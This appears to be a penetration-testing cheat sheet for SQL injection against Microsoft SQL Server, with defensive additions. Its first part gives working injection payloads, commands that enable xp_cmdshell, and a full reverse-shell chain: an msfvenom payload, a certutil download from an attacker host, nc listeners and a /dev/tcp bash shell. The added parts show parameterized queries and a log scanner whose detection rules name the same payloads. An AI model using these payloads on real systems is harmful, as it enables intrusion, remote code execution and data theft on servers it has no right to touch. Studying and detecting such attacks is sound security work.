Microsoft SQL Injection
List of commands
Basic Commands
?param=' OR 1=1--
?param=' OR 1=2--
?param=' ORDER BY 1,null,3,4--
TABLE NAME:
?param=' UNION SELECT table_name FROM information_schema.tables--
COLUMN NAME:
?param=' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table1'--
MODIFIED UNION:
?param=' UnIoN SELECT key1, key2, key3 FROM table1--
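The payloads above only work when the application pastes the parameter value straight into the SQL text. As an added illustration (not part of the original cheat sheet), the following Python puts a string-concatenated lookup next to its parameterized replacement and runs both against a small constructed table. It assumes Python's bundled sqlite3 as a stand-in for SQL Server; the tautology and UNION behaviour shown is the same in both engines, while SQL Server specifics such as information_schema views and xp_cmdshell are out of scope for the stand-in.

```python
import sqlite3


def make_db():
    """Constructed sample data; sqlite3 stands in for SQL Server here (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        (1, "widget", "public"),
        (2, "gadget", "public"),
        (3, "prototype", "internal"),
    ])
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'hash-placeholder')")
    return con


def vulnerable_lookup(con, category):
    """Builds the statement by string concatenation, so the ?param value
    becomes SQL text: ' OR 1=1-- turns the WHERE clause into a tautology and
    a UNION payload appends a second SELECT against another table."""
    sql = f"SELECT id, name FROM products WHERE category = '{category}'"
    return con.execute(sql).fetchall()


def safe_lookup(con, category):
    """Parameterized query: the value travels separately from the SQL text,
    so the same payloads are compared literally against the category column
    and match nothing."""
    return con.execute(
        "SELECT id, name FROM products WHERE category = ?", (category,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"
    print("concatenated:", vulnerable_lookup(db, payload))  # every row, including 'internal'
    print("parameterized:", safe_lookup(db, payload))       # []
```

The same fix applies to SQL Server drivers (pyodbc, ADO.NET, JDBC): bind the value as a parameter and the comment sequence and UNION keyword never reach the parser as SQL. Input filtering alone does not close the hole, since the `UnIoN` mixed-case payload above is exactly the kind of variation that slips past keyword blocklists.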
Getting Shell
Using xp_cmdshell: This is a system extended stored procedure in Microsoft SQL Server that executes operating system commands and programs from within SQL Server, giving the database engine direct access to the host's command shell. It is disabled by default; however, it can be enabled through EXECUTE queries if the database user is a member of the sysadmin server role or holds the "ALTER SETTINGS" server permission.
Injection command to turn on xp_cmdshell:
?param='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
Setting up a reverse shell
On Windows:
Use MSFvenom to generate a reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o reverse.exe
Set up a simple http server to host reverse shell:
python3 -m http.server 8080
Injection command to fetch reverse shell:
?param='; EXEC xp_cmdshell 'certutil -urlcache -f http://$IP:8080/reverse.exe C:\Windows\Temp\reverse.exe'; --
Listener on attack machine:
nc -nvlp 4444
Injection to execute reverse shell:
?param='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe';--
On Linux:
Listener on attack machine:
nc -nvlp 1337
Injection to execute reverse shell:
?param='; EXEC xp_cmdshell '/bin/bash -i >& /dev/tcp/$IP/1337 0>&1';--
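Every step of the shell chain above travels through the web tier as a query string, so the same patterns that make the payloads work make them easy to spot in access logs. The following Python is an added detection example, not part of the original cheat sheet: it URL-decodes and lower-cases the query string of each access-log line (so the UnIoN casing and percent-encoding from the commands above do not evade it) and matches it against rules for the tautology, UNION/schema enumeration, the sp_configure enablement of xp_cmdshell, the xp_cmdshell call itself, and the certutil/dev-tcp download-and-connect stage. The log lines are constructed for the example; the rule names and severities are this example's own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format), not real traffic. The
# query strings mirror the payload shapes on this page, percent-encoded the
# way a browser or tool would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?param=42 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?param=%27%20OR%201%3D1-- HTTP/1.1" 200 9000
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?param=%27%20UnIoN%20SELECT%20table_name%20FROM%20information_schema.tables-- HTTP/1.1" 200 7000
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?param=%27%3B%20EXEC%20sp_configure%20%27xp_cmdshell%27%2C%201%3B%20RECONFIGURE%3B%20-- HTTP/1.1" 500 120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item?param=%27%3B%20EXEC%20xp_cmdshell%20%27certutil%20-urlcache%20-f%20http%3A%2F%2F10.0.0.9%3A8080%2Fr.exe%20C%3A%5CWindows%5CTemp%5Cr.exe%27%3B%20-- HTTP/1.1" 500 120
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=union+station HTTP/1.1" 200 800
"""

# (rule name, severity, regex); names and severities are this example's own.
# Patterns run against the decoded, lower-cased query string.
RULES = [
    ("tautology",          "medium", re.compile(r"'\s*or\s+\d+\s*=\s*\d+")),
    ("union_select",       "medium", re.compile(r"\bunion\b.*\bselect\b")),
    ("schema_enum",        "medium", re.compile(r"information_schema\.(tables|columns)")),
    ("xp_cmdshell_enable", "high",   re.compile(r"sp_configure\s*'xp_cmdshell'")),
    ("xp_cmdshell",        "high",   re.compile(r"\bxp_cmdshell\b")),
    ("download_tool",      "high",   re.compile(r"\bcertutil\b.*-urlcache|/dev/tcp/")),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_line(line):
    """Parse one access-log line; return (ip, path, [matched rule names])
    or None when the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.partition("?")[2]          # everything after the first '?'
    decoded = unquote_plus(query).lower()   # undo %xx/+ encoding and case tricks
    hits = [name for name, _sev, rx in RULES if rx.search(decoded)]
    return m.group("ip"), path, hits


def scan_log(text):
    """Return a finding per line that matched at least one rule, tagged
    'high' if any high-severity rule fired, else 'medium'."""
    severity = {name: sev for name, sev, _rx in RULES}
    findings = []
    for line in text.splitlines():
        parsed = scan_line(line)
        if not parsed or not parsed[2]:
            continue
        ip, path, hits = parsed
        top = "high" if any(severity[h] == "high" for h in hits) else "medium"
        findings.append({"ip": ip, "path": path, "hits": hits, "severity": top})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["hits"])
```

The final sample line (`q=union+station`) is there to show that the UNION rule needs a following SELECT, which keeps ordinary search traffic out of the alert queue. On the database side the same event is visible independently of the web logs: the `xp_cmdshell` row in `sys.configurations` flips its `value_in_use` when the sp_configure step above succeeds, so a periodic query of that view, or an audit on the sp_configure call, catches the enablement even if the request never reached a logged web tier.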